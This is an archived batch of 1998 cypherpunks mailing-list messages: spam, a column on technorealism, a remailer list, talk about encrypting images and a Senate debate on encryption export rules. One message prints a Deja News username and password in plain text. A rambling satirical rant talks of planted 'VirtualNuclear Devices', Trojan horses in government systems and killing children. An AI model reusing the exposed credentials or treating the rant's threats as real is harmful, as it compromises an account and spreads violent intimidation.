  you looking for something to solve this problem? HOW MANY TIMES HAVE YOU:
  Stepped out of the room to go to the bathroom to find out you have been kicked off AOL.
  Then you have a hard time getting back on!! Or, you were downloading a file and AOL kicks
  you offline. Then it takes forever to do it all over again!! This "SOFTWARE PROGRAM"
  dismisses the "idle" and 46-minute "stayonline" messages that AOL uses to annoy the hell out
  of its members. Once you install the software, you do nothing but enjoy being on AOL.
  Before I had this program installed, I had to reboot when this happened. It is a small memory
  resident program (actual disk size is 119KB - IBM Compatible only). The timer hits the
     buttons automatically when they come up. THIS "SOFTWARE PROGRAM" WILL BE
     EMAILED AS SOON AS WE RECEIVE YOUR ORDER (Not for MAC Users). 

     HOW TO ORDER YOUR TIMER 
     This program sells for $5. Send a check, money order, or cash to: Aaron McKay
     21111 hwy 140 E. Dairy OR, 97625
     Name:_______________________________________________________________________________________________
     Street Address:__________________________________________
     City:_____________________________________________State:__________
     ZipCode:____________ Area Code & Phone:__________________________
     EMAIL:___________________________


</FONT><FONT  COLOR="#000000" SIZE=3>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 16 Jun 1998 08:21:51 -0700 (PDT)
To: cypherpunks@toad.com
Subject: icomputing: "Naive Realism"
Message-ID: <v04011700b1ac45667f6b@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




"Cryptoanarchist" makes it to the printed word.  Can an OED entry be far
behind? :-).

Of course, it dawns on me that she might mean "cryptoanarchist", below, in
the same way that Vidal called Buckley a "cryptofascist"...

Cheers,
Bob Hettinga

"Web doyenne?"

----------

http://www.zdnet.com/icom/content/columns/1998/05/techno.realists/index.html
[Image]
  [ZDNet]               [Click here for Microsoft Daily News.]
                                        [Image]

                             [Try out ZD Internet Magazine]

                                                                   [
                                                           Commentaries
                                                           ]

                                                           May
                                                           11,
                                                           1998

                                                           Naive
                                                           Realism:
                                                           Taking
                                                           on
                                                           the
                                                           Technorealists

                                                           Practical
                                                           development
                                                           of
                                                           the
Internet comes from doing
practical things.

By Angela Gunn

The technorealist manifesto,
in case you missed it, is a
pompous version of the "Why
The Internet Isn't Evil"
speech you give to your mom's
bridge club.

Unleashed back in March, the
"manifesto" was authored by many people who just a year or two ago were
blathering about the world-changing, paradigm-shifting, cryptoanarchist Net,
scaring your mom's bridge club so thoroughly that, well, they asked you if
the Internet was evil.

Drop by the technorealism site and read this document. Sign it if you like.
Just don't expect it to make any difference to you or yours.

The manifesto is a simplistic summation of points most of us inside the
industry already know from years of experience, thought, and online
discussion. And for those outside the industry, it's all but
incomprehensible.

The whole thing stinks of college-student libertarianism, except for the
part about government having an important role to play on the electronic
frontier (a point that galled several actual Libertarians and college
students, as evidenced by their parody sites).

And it's frivolous. Development of the Internet as a practical entity comes
from the doing of practical things with the Internet. The programmer
laboring to improve customer access to a tech-support database, the site
producer working to streamline her site's design, the people who gave us
online ticket ordering and package tracking and hotel reservations--these
are the people who will convince the rest of the world that the Net is
worthwhile and important.

And in the battle to shape the Net, the genuine visionaries, theorists, and
even the political analysts have already taken the field. By assuming the
mantle of public debate, the too-fabulous New Media in-crowd behind the
manifesto has done a disservice to those of us in for the long haul.

Put another way, this fashionable cyber-asceticism is bad news to those
actually involved with technology--condescending in assuming that those in
the trenches can't understand the ramifications of what they do, oblivious
in assuming that there's anything fresh in the manifesto, and irresponsible
in not crafting a document that provides a genuine foundation for
discussion; that is, a real manifesto.

And that's what is really galling: they blew a good opportunity. This vague,
random document doesn't lay groundwork for discussing the real social issues
confronting technologists, creators, consumers, and citizens.

The real battle--to bring the Net to its rightful, humble, ubiquitous place
in the world's social, political, and economic life--has little to do with
manifesto pronouncements such as "We are technology 'critics' in the same
way, and for the same reasons, that others are food critics, art critics, or
literary critics."

The public is best brought onto the battlefield by careful, informed,
comprehensible discourse; these "critics" haven't even drawn up a readable
map of the countryside.

Don't let this single-mast ship of fools sail away with the discussion. They
have no authority (intellectual, moral, or otherwise) to dictate the terms
of debate, especially since their manifesto makes such a mess of it. That
debate belongs to you and me and the rest of the industry--and your mom's
bridge club--at least as much as it does to these
Siskel-and-Ebert-come-latelies.

But don't forget: when you're done amusing yourself with the technorealists'
down-the-middle drive for pundit spots in Harper's, The Nation, and the Utne
Reader, you've got a lot of work to do to build the real Internet.

Web doyenne Angela Gunn has been covering the Internet and its culture for
nine years. Send e-mail to agunn@zd.com.

Send us your questions and comments about the Internet Computing MegaSite.

                 [Navigate the Internet Computing MegaSite]

                                   [Image]
-----------------
Robert A. Hettinga
Philodox Financial Technology Evangelism
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
Philodox: <http://www.philodox.com>, e$: <http://www.shipwright.com/>
          <mailto: rah@philodox.com>     <mailto: rah@shipwright.com>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Telco Telefonia" <telco@telco.it>
Date: Tue, 16 Jun 1998 15:41:41 -0700 (PDT)
To: <telco@telco.it>
Subject: Telephone security - Greetings from Italy
Message-ID: <001101bd9948$f32316a0$ede53ec3@mauro>
MIME-Version: 1.0
Content-Type: text/plain


Hi.
We are looking for resellers, visit us.
This is a message of promotion and information; you belong to a list whose
adherent we think to have interested in the telephone security and the
telephone market.
Best regards
Dario MARLIA - President  TELCO Telefonia
dmarlia@telco.it

Home page : http://www.telco.it
Home page Security Telephone Products: http://www.telco.it/security
Home page Telephone Equipments: http://www.telco.it/telephony
Home page Computer Telephone Integration (CTI): http://www.telco.it/computer
Home page Italian Decorator Phones: http://www.telco.it/telephones

To let be canceled by the list it is simple, is enough to re-send (forward)
this message to: deleteme@telco.it

*********************************************
company:        TELCO Telefonia srl
address:          via dei Metalmeccanici, 53
city:                CAPEZZANO Camaiore/Lucca
country:          ITALY
zip:                 55040-i
Tel:                +39(0)584 969608 - 969654 - 969621
Fax :              +39(0)584 969637 - 969672
e-mail:            telco@telco.it
visit us at        http://www.telco.it
*********************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mshall@aol.com
Date: Tue, 16 Jun 1998 18:44:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: gjhyjfg
Message-ID: <11ce60ed.35873618@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


ghjkgjfj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fay16@msn.com (free)
Date: Wed, 17 Jun 1998 06:07:49 -0700 (PDT)
To: fay16@msn.com
Subject: FREE TRIAL MEMBERSHIP
Message-ID: <19980617525OAA44566@post.nwnet.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


THE LATEST IN ADULT TECHNOLOGY!!!

BRAND NEW XXX ADULT SITE

FREE TRIAL MEMBERSHIP

Please visit the latest in Live Video Conferencing.
1000 channels of hardcore!! Live rooms!!! Young dancers!!!
Large picture gallery! Thousands of pictures!! Come and visit our site for
a great experience.

http://206.165.153.5/best/zx2/index.html
****************************************
****************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Tu <ATU5713@compuserve.com>
Date: Wed, 17 Jun 1998 04:35:58 -0700 (PDT)
To: Cypher Punks Mailing List <cypherpunks@toad.com>
Subject: Please update this
Message-ID: <199806170913_MC2-407F-35CC@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

First of all, since I am not subscribed to the list, please reply to my
address atu5713@compuserve.com

You know, there is a program written in the Euphoria programming language
that helps in chaining remailers.  It also works with PGP.  Before I try
it, however, I want to know if the remailers in the .ini file are still
operating.  Would someone please tell me if the following remailers are
still operating.  * means that the remailer supports encryption by pgp.

        hh@pmantis.berkeley.edu
        hh@cicada.berkeley.edu
        hh@soda.berkeley.edu
        nowhere@bsu-cs.bsu.edu
        remail@tamsun.tamu.edu
        remail@tamaix.tamu.edu
*       ebrandt@jarthur.claremont.edu
*       hal@alumni.caltech.edu
*       remailer@rebma.mn.org
*       elee7h5@rosebud.ee.uh.edu
*       phantom@mead.u.washington.edu
*       hfinney@shell.portal.com
*       remailer@utter.dis.org
        00x@uclink.berkeley.edu
*       remail@extropia.wimsey.com

thanks in advance.

--Alan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Tu <ATU5713@compuserve.com>
Date: Wed, 17 Jun 1998 07:06:06 -0700 (PDT)
To: Cypher Punks Mailing List <cypherpunks@toad.com>
Subject: Invalid reference
Message-ID: <199806171143_MC2-407E-7D24@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain


The chain program I referred to earlier is not, repeat not, as far as I
know, written in Euphoria.  I don't know what led me to think that.

--Alan
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: www@dejanews.com
Date: Wed, 17 Jun 1998 09:41:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Deja News Registration Confirmation
Message-ID: <199806171819.NAA00836@x7.dejanews.com>
MIME-Version: 1.0
Content-Type: text/plain



Welcome to My Deja News!

You have registered for My Deja News using the email address:
cypherpunks@toad.com. If you did not register for My Deja News, 
please ignore this message.

To enable you to post messages on Deja News, we must confirm 
your email address. This allows us to minimize "spam" and other
problems. To confirm your email address, visit the following Web
page:

http://www.dejanews.com/ec.xp/Zf6ae0a36706f3c065455878ce0a7f9a65e952de

If your email software supports it, you can simply click on the
link. Since this Web page address (URL) is quite lengthy, however,
you may find it necessary to copy the entire URL and paste it into
your Web browser.

As a reminder, your username is jahminh and your password 
is tonite.  You may wish to keep this email to refer to in 
case you forget.

If you have any questions about My Deja News, please refer to the
Help page at http://www.dejanews.com/help/help_regstr.shtml

Thanks,
Deja News





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason" <storm@uit.net>
Date: Wed, 17 Jun 1998 09:52:05 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Re: Crypto Books/Archive
Message-ID: <006101bd9a1d$29071120$a460a0d1@jason.kc1.net>
MIME-Version: 1.0
Content-Type: text/plain


> I have this idea bout making a cryptography program that will encrypt
> pictures. I know that you can do this with PGP, but I mean it in a
> little different way. What I want to do is this: You have opened a
> picture in, ACDSee for example, and you want some of the picture only
> for a certain person. So you chose that part of the picture, encrypt
> it, and send it to the person you want. What do you guys think?

Jan,


 I can't say that I full understand what you're doing, or maybe I just don't
see why you're doing it. If you mean that you want to take part of a picture
and encrypt it and send it to someone, couldn't you just crop the desired
section of the image out and save it as a different file, then encrypt it
via PGP, etc. I don't see how encrypting part of a picture is any different
than, say.. cutting part of a text file out and saving it to another file
and encrypting that portion of it. That isn't to say that if you had some
new form of encryption that it wouldn't be worth exploring, only that I tend
to question the originality or usefulness (relative to current, widely
available crypto technology) of your concept. Maybe you could explain it in
more detail to us.

...Jason Sloderbeck
stom@uit.net
Plasmic Computer Systems







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: haxor_401@juno.com (OoOoOoO OoOoOoO)
Date: Wed, 17 Jun 1998 13:57:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <19980617.165512.6918.1.HaXoR_401@juno.com>
MIME-Version: 1.0
Content-Type: text/plain


What is the command to recieve this list in DIGEST form.?

_____________________________________________________________________
You don't need to buy Internet access to use free Internet e-mail.
Get completely free e-mail from Juno at http://www.juno.com
Or call Juno at (800) 654-JUNO [654-5866]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Wed, 17 Jun 1998 08:10:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crypto Books/Archive
Message-ID: <3587F42C.53275B32@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Greetings,

I wish to inquire where I can buy books about cryptography. If these
bookstores are located somewhere in Europe then it would be a little
more convenient for me, if not, then that's not too much of a problem.
Thanks in advance.

I'm working on my archive, although the reason why there hasn't been
anything new for a while is because I'm doing preparation courses in
math and physics for the Warsaw University of Technology. However,
I'll have something new on there soon. The reason why there isn't
anything great at the moment is because I'm a lousy worker, so I can't
be rushed.

I have this idea bout making a cryptography program that will encrypt
pictures. I know that you can do this with PGP, but I mean it in a
little different way. What I want to do is this: You have opened a
picture in, ACDSee for example, and you want some of the picture only
for a certain person. So you chose that part of the picture, encrypt
it, and send it to the person you want. What do you guys think?

Sincerely yours,
Jan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Wed, 17 Jun 1998 20:31:50 -0700 (PDT)
To: cypherpunks@toad.com
Subject: SweatHog Log -- SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C7DB7.A54F7F00.23@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


SweatHog Log -- SPACE ALIENS HIDE M DRUGS!!!
---------------------------------------------

[Austin Nutly News--LoneBeerState]IT WAS THE tURKEbASTE
of times, it was the LiverWurst of times...
Bob Wills Beer and Lone Star Music. Captain BeefJerky and
the Lost Bozo Band opening for Jerry Jeff Garcia and the
DreadFul Drunks at the Split Lip Saloon. Knocking back
shots of Townsend's Treacherous Treat at Amaretto World
HindQuarters. Mom Nelson declaring C.J. Parker to be her
illegitimately adopted son, making him a half-nelson and
making him live in the basement of the outhouse behind 
Willie's Fool Hall.

A million degrees in the shade and TruthMongrel sitting in
the truck in the parking lot of the HEB Central Market Cafe
while Toto was inside drinking cold beer and asking the
barmaid what type of wine goes with TruckRoasted PuppyDog.
Drinking West Texas ChugWater...


Austin CypherPunks gathered around a couple of tables in 
the beer garden, the BigRedBook unflapping in the breeze
and serving as a standard to rally together a handful of
anarchist frontiers(wo)men to prepare to stand as the lone
outpost against the mighty Digital Army of Santa AnnaChrist
in his War Against The Digitally United States of Terra.
JimBob Choate drawing a line in the sand...
Most of the CypherPunks crossed that line--the bar was on
the other side of it--but they came back.

A strange, deranged desperado appearing out of nowhere to
announce that someone had nuked DC, and he wanted to ask
them a few questions, then sitting down and babbling in a
nonsensical manner in order to distract their attention 
while he played footsie with the blonde sitting across from
him, until she finally left, in disgust.
WeBeastMaster JimBob waiting until only the StewedGuy and
the Disparate Stranger were left before passing along the
SecretMessageThatHadNoMeaning from Declan McCullagh. The
Dissipating Strangler fading into the mist with a bottle
of red wine tucked under his arm.

Lieutenant JimBob Choate, Army of Dog-Digital Division &
MeatSpace Multiplication, feeling a shiver go down his spine
as he walked slowly to his vehicle, heard a TruthMongrel
howling in the distance, and realized that 'red wine' goes
with TruckRoasted PuppyDog.]


  MenInTheShadows unable to find the second VirtualNuclear
Device claimed to have been planted in a pubic building
eleven KILLometers from MongerItaVille--wondering if their
first mistake hadn't been to threaten a six-year old child
and his mother with deportation from Canada if they continued
to involve themselves in the battle for Medicare in Saskatchewan.
  For almost a half-century thereafter, the child had been a
thorn in their side, seemingly breaking every rule in the book,
violating everything that anal-retentive WhiteCanadianImmigrants
held sacred as they strove to promote the Rule of (White)Law
in the Great White Snort. Despite their many failed attempts
to imprison him, ususally succeeding only in harrassing him
and causing him great personal loss and expense, they had never
before had to fear for their own lives and the safety of their
families, but now all that had changed...

  An elite, secretive cabal of Mounties gathered around a table
reviewing the security implications of a hidden file being found
on their computer system which had the same name as the file
on the floppy disk left at the site of the first VirtualNuclear
Device found in a public building eleven KILLometers from
MongerItaVille.
  Silence in the room as each of them heard, in their own mind,
the screams of the Author as they resounded through the Analogue
Reality of his home in Bienfait, through the Digital Reality of
MongerItaVille, and through the MeatSpace DigiZeros on a dozen
or more Canadian Government computer systems.
  "OU WANT TO FUCK WITH *CHILDREN*? OU WANT TO STEAL M NEPHEWS'
COMPUTERS? OU WANT TO FILE FALSE CHARGES ON M NEIGHBOR'S FUTURE
LITTLE GLUE-SNIFFER, OU NAZI RATFUCKERS?
  "THE *MEATSPACE* REVOLUTION IS *NOW*!!!!"


  The Author may be bluffing, of course, but could they really 
afford to take that chance?
  HeOrShe had offered them "pole position" on receiving the key
that the BackDoor Boogie (TM) was being played in to provide a
soundtrack to the RCMP Musical Ride taking place on Trojan Horses
ridden by DigitalAnarchists throughout Canadian Government computer
systems.

  The offer was simple enough...return all of the stolen computers
to the possession of Human Gus-Peter and the RCMP would get the
checkered flag in the race against finding their digital security
breach...if there, in fact, *was* one...
  The 'clues' of its existence were rather vague, though startling,
and they could conceivably be the result of collusion on a part of
the Author's widespread Inner Circle, which undoubtedly included
more than a few people with access to secure Canadian Government
computer systems.
  Of course, the phrase 'pole position' implied that there were
others in the race who the Author could bless with the checkered
flag if they were the first to provide Human Gus-Peter with a
state-of-the-art portable multi-media computer such as the one
that had been stolen from the Author, but the Mounties were
reluctant to suffer the loss of face that would be involved in
rectifying the consequences of their own illegal and heavy-handed
acts of oppression and repression.

  The Mounties knew that they were, to a certain extent, vulnerable,
having actively promoted the persecution of a mentally unstable
individual at a time when his medications were running low, in the
hope that he would explode in a manner that would cause him to
perform actions which he could be legally held accountable for.
It wouldn't look good, however, if it came out that the Mounties
themselves were taking the precaution of wearing bullet-proof vests
for their own protection during their attempts to provoke the
Author to actions of raging insanity, while leaving the children of
the community vulnerable to the MeatSpace actions of a violent
psychotic currently writing the "Bienfait Nutly News 'KILL THE
CHILDREN' Special."


  The RCMP had failed to intercept the computer disks and audio
tapes that the Author had mailed to Declan McCullagh from Montana,
but the Netly News journalist had not yet received them, so it
seemed that *someone* had intercepted them.
  Every indication was that there was only a single copy of the
material the Author had stashed south of the 49th parallel just
before his computers were confiscated, but there was no telling,
for sure. Besides, the Mounties had confiscated the voice-activated
tape recorder they found on their last illegal entry to his home,
and the audio tapes he had could conceivably be of one of the
American intelligence agents monitoring his residence, such as
the retired Air Force Intelligence officer who had become rather
friendly with him at the CoalDust Saloon.]
  It was a shame that the Author had found and destroyed the
'evidence' they had planted in his truck shortly before he 
skipped the country, but the 'evidence' they had 'found' after
his departure would suffice. The reference to the *second*
VirtualNuclearDevice was troubling, however, since its existence,
if real, could result in the whole operation blowing up in their
face.

  Nonetheless, the Mounties considered it better to lose a few
citizens, or even a whole town, than to lose face, and the
Author's modus operandi was to provide fair warning before the
date and time of his nefarious activities, so the Mounties were
confident that they could follow in the footsteps of the BATF and
arrange to be conveniently gone when the shit hit the fan.

  Then they would have that ShitDisturbingMonster dead to rights...







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Wed, 17 Jun 1998 17:51:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: One last time
Message-ID: <9be137bf.3588643d@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry about buggin' you guys so much on this, but I think I have a final piece
of the puzzle together.  It's amazing how well all the pieces fit.  I think
now the big task is to keep it on-line (and promotion - spread the word!).

If you weren't convinced before, this should do it.  Check it out again,

Stan,

http://members.aol.com/whtsametau/camel/index.htm





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Wed, 17 Jun 1998 13:55:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cypherpunk on IRC
Message-ID: <35882DF4.18A9D0C6@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Greetings...

So where are you people on IRC? it would be nice to talk more directly
bout crypto ideas....

Jan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan <jdobruck@kki.net.pl>
Date: Wed, 17 Jun 1998 15:09:06 -0700 (PDT)
To: Jason <cypherpunks@toad.com
Subject: Re: Crypto Books/Archive
In-Reply-To: <006101bd9a1d$29071120$a460a0d1@jason.kc1.net>
Message-ID: <35883F39.954C5B5D@kki.net.pl>
MIME-Version: 1.0
Content-Type: text/plain


Jason wrote:
> 
> > I have this idea bout making a cryptography program that will encrypt
> > pictures. I know that you can do this with PGP, but I mean it in a
> > little different way. What I want to do is this: You have opened a
> > picture in, ACDSee for example, and you want some of the picture only
> > for a certain person. So you chose that part of the picture, encrypt
> > it, and send it to the person you want. What do you guys think?
> 
> Jan,

Greetings,
 
>  I can't say that I full understand what you're doing, or maybe I just don't
> see why you're doing it. If you mean that you want to take part of a picture
> and encrypt it and send it to someone, couldn't you just crop the desired
> section of the image out and save it as a different file, then encrypt it
> via PGP, etc. I don't see how encrypting part of a picture is any different
> than, say.. cutting part of a text file out and saving it to another file
> and encrypting that portion of it. That isn't to say that if you had some
> new form of encryption that it wouldn't be worth exploring, only that I tend
> to question the originality or usefulness (relative to current, widely
> available crypto technology) of your concept. Maybe you could explain it in
> more detail to us.
> 
> ...Jason Sloderbeck
> stom@uit.net
> Plasmic Computer Systems

The idea is like with the plug-in for Pegasus Mail. You don't need to
go to PGP encrypt the message and then send it. You can do that right
through the Pegasus Mail. Same idea with my program. Would make it a
little faster instead of encrypting your piece of picture in many
steps you can do it with one push of a button.

Another thing. You're right. You can cut the piece of picture you want
to encrypt and then encrypt that little piece. But if you want to send
the whole image, and make that little piece invisible to everyone else
but the sender... this is what I'm getting at. If someone still
doesn't understand, I'll try again later.

Sincerely yours,
Jan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: video@streetparty.org
Date: Thu, 18 Jun 1998 05:48:42 -0700 (PDT)
To: Friend@public.com
Subject: Win this video!
Message-ID: <199806181228.IAA14928@ncc.uky.edu>
MIME-Version: 1.0
Content-Type: text/plain


Video from
STREET PARTY '98 - UK WILDCAT STYLE
http://www.angelfire.com/biz/web201c5/index.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Bishop <martybishop@yahoo.com>
Date: Thu, 18 Jun 1998 05:52:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: TheCodex's D.I.R.T. surveillance software
Message-ID: <19980618125041.28878.rocketmail@send1a.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain


I have come across a webpage at

http://www.thecodex.com/dirt.html

that describes a so-called D.I.R.T. (Data Interception by Remote
Transmission) software enabling the attacker (be it a criminal or
police or govt.) to remotely keep a close eye on everything that't
going on on the target PC. I can pretty much imagine how it works once
it's installed but what I'd like to know is *how* it gets installed on
the target computer?
I would also appreciate any info about the product from people with
first hand experience, since I intend to do an in-depth research for
one of the European Governments.

Thanks in advance!

Rgds,

Martin Bishop




_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 18 Jun 1998 05:52:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Senators Challenge Crypto Policy
Message-ID: <199806181252.IAA06378@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


[Congressional Record: June 17, 1998 (Senate)]

                               ENCRYPTION

  Mr. LOTT. Mr. President, I rise today out of concern for our nation's
computer and electronic industries. As you are well aware, the
Administration's

[[Page S6438]]

export policies prohibit American companies from selling state-of-the-
art encryption technology abroad without recovery keys and back door
access. Encryption is a series of mathematical formulas that scramble
and unscramble data and communications. It is used to thwart computer
hackers, industrial and foreign espionage agents, and criminals from
gaining access to and reading sensitive personal, business, and
military communications. The higher the bit-key length, the more
difficult it is for unauthorized persons to break the code. Technically
advanced encryption ensures that an individual's medical, financial,
business, personal records and electronic-mail cannot be accessed
without their consent. The Administration is now promoting the
deployment of recovery keys so designated third parties would be able
to access and share with law enforcement the computer data and
communications of American citizens without their knowledge. Currently,
government mandated key escrow is not required and is opposed by the
computer industry, privacy advocates, legal scholars, and by many
members of Congress.

  Mr. LEAHY. While current law does not mandate any key recovery, the
current Administration, just as past Administrations, uses the export
control regime to ``dumb down'' the encryption available for widespread
integration into high-tech products intended for both domestic use and
for export to foreign customers. Export regulations in place now are
being used expressly to coerce the development and use of encryption
products capable of giving law enforcement surreptitious access to
plaintext by conditioning the export of 56-bit DES encryption on
development of key recovery features.

  These regulations are scheduled to sunset in December 1998, at which
time export of even 56-bit strength encryption will no longer be
permitted. I understand that the Administration is already undertaking
discussions with industry on what will happen upon sunset of these
regulations. I have long contended that taking unilateral steps will
not resolve this issue, but instead could delay building the consensus
we so urgently need. This issue simply cannot by resolved by Executive
fiat.

  Mr. ASHCROFT. Mr. President, I have been involved in the debate
regarding encryption technology and privacy for more than three years
now. In the course of that time I have not seen any real attempt by the
White House to resolve this problem. In fact, over the course of that
time the Administration has moved further from negotiation by taking
increasingly extreme positions on this critical national issue.

  Mr. CRAIG. Mr. President, as you have heard, current U.S. policy
allows only encryption below the 56-bit key length to be sold abroad.
For a long time now, software companies have argued that this level of
encryption is so low it provides little security for the information
being transmitted over the ``super highway.'' This policy also states
that, in the production of encryption stronger than 56-bit, software
companies must provide some type of ``backdoor'' access to ensure law
enforcement can decode encrypted material.

  Addressing this from an economic perspective, customers--especially
foreign customers--are unwilling to purchase American encryption
products with backdoors and third-party access. This is particularly
true since they can buy stronger encryption overseas from either
foreign-owned companies or American owned companies on foreign soil
without these invasive features.

  Mr. WYDEN. Since coming to the Senate, I have worked side-by-side
with Senators Burns, Ashcroft, Leahy and others on the critical issue
of encryption. Our common goal has been to craft a policy that puts the

United States squarely out front of the crypto-curve, rather than locks
us permanently behind it. A one-size-fits-all government policy simply
won't work in this digital era. We all recognize and acknowledge the
legitimate needs of law enforcement and the national security
communities, but tying the hands of America's high technology industry
in the process will serve neither those needs, nor the national
interest in maintaining our competitive edge in the fiercely
competitive global marketplace. It's time to move forward with
comprehensive encryption reform legislation.

  Mr. BURNS. I would like to point out that the government's plan for
encryption--whether they call it ``key escrow'' or ``key recovery'' or
``plaintext access''--simply won't work. Eleven of the world's most
prominent computer security experts have told us government mandated
key recovery won't work because it won't be secure, as explained in a
study published this week by the Center for Democracy and Technology.
Key escrow also won't work because it will cost billions, as revealed
in a recent study published by the Business Software Alliance. We have
also been told that the kind of system the Administration wants is not
technically feasible. Additionally, constitutional scholars testified
that government mandated key escrow, third party recovery probably
violates the Bill of Rights.

  Mr. LOTT. Even though a national recovery system would be technically
unfeasible, costly, and violates an individual's privacy rights, the
Administration continues to require key escrow as a precondition for
relaxing America's encryption policy. Again, Mr. President, I would
point out that state-of-the-art encryption is available in the
international marketplace without key recovery and without backdoor
access. This backdoor door requirement is simply backward thinking
policy. It does not make sense to hold the computer industry hostage to
force the creation of such an unworkable system.

  Mr. BURNS. The Majority Leader is absolutely right. We do not need
experts to tell us key recovery will not work. All that is needed is a
little common sense to understand that no one will buy systems with
backdoor access. Criminals will not escrow their keys and terrorists
will find keyless systems from America's foreign competitors. There is
nothing we can do to stop undesirables from using strong, unescrowed
encryption.

  Mr. LOTT. Even though advanced encryption products are widely
available across the globe, the White House continues to stall
Congressional and industry attempts to reach a sensible market oriented
solution to the nation's outdated encryption export regime. This
stonewalling tactic will only cede even more of our nation's technology
market to foreign competitors and America will lose forever its ability
to sell encryption technology at home and abroad.

  It is time to change America's export policy before it is too late.
If the Administration will not do what is right, reform its export
regime, then Congress must enact encryption reform during this session.

  Mr. LEAHY. The Majority Leader is correct that reform of our
encryption policy is needed. The Attorney General came to the Hill in
March and asked for a legislative moratorium on encryption matters.
This request was made because the Administration wanted to talk with
the information technology industry about developing means for law
enforcement to gain surreptitious access to plaintext scrambled by
strong encryption. According to eleven of the world's leading
cryptographers in a report reissued on June 8, the technical risks and
costs of such backdoors ``will exacerbate, not alleviate, the potential
for crime and information terrorism'' for America's computer users and
our critical infrastructures.

  In the Senate we have a name for debate that delays action on
legislative matters. We call it a filibuster. On encryption policy, the
Administration has been willing to talk, but not to forge a real

solution. That amounts to a filibuster. The longer we go without a
sensible policy, the more jobs will be lost, the more we risk eroding
our privacy rights on the Internet, and the more we leave our critical
infrastructures vulnerable.

  Mr. BURNS. We can readily see that the current U.S. policy on
encryption jeopardizes the privacy of individuals, the security of the
Internet, and the competitiveness of U.S. industry. We have been
debating this issue since the Administration's introduction of the ill-
fated Clipper chip proposal over five years ago. Yet no substantial
change in Administration policy has taken place. It is time for us to
take action.

  I first introduced comprehensive encryption reform legislation in the

[[Page S6439]]

form of the Pro-CODE bill over two years ago, then reintroduced it in
this Congress with the cosponsorship of the Majority Leader, Senators
Ashcroft, Leahy, Wyden, and others. Along with Senators Ashcroft,
Leahy, and others, I am also an original cosponsor of the E-PRIVACY
bill, which would foster the use of strong encryption and global
competitiveness. We have held numerous hearings on the issue. Yet
despite the increasingly desperate drumbeat of criticism from industry,
individuals, and privacy groups, from across the political spectrum,
the Administration's policy has remained fundamentally unchanged.

  Mr. LEAHY. Since the hearing I chaired in May 1994 on the
Administration's ``Clipper Chip'' proposal, the Administration has
taken some steps in the right direction. Clipper Chip is now dead, and
the Administration has transferred authority over the export of
encryption products from the State Department to the Commerce
Department, as called for in legislation I introduced in the last
Congress with Senators Burns, Wyden and others. Furthermore, the
Administration has permitted the export of up to 56-bit DES encryption,
at least until the end of this year. But these actions are simply not
enough for our high-tech industries to maintain their leading edge in
the global marketplace.

  Mr. ASHCROFT. Our technology companies need to be able to compete
effectively. Without reasonable export laws our technology sector will
be seriously harmed. More encryption companies will leave the country
so they are free to sell their products around the globe as well as
within the United States. Make no mistake, the market will not be
denied. Today, robust encryption products from Canada, Japan, Germany
and elsewhere are being sold on the world market. You have heard of the
companies that are manufacturing and selling encryption. They are
Nortel, Nippon and Seimens. These are not upstart companies. They are
substantial players on the international scene, and they offer
encryption products that are technically and financially competitive
with those produced in the U.S.

  Mr. LOTT. That's right. In fact, a recent survey conducted by Trusted
Information Systems found that hundreds of foreign companies sell over
600 encryption products from 29 countries. It is even possible to
download some of the strongest technology available, 128-bit key length
encryption, off of the Internet. Clearly, America's policy of
restricting the sale of American encryption software and hardware has
not impacted the availability and use of this technology throughout the
globe.

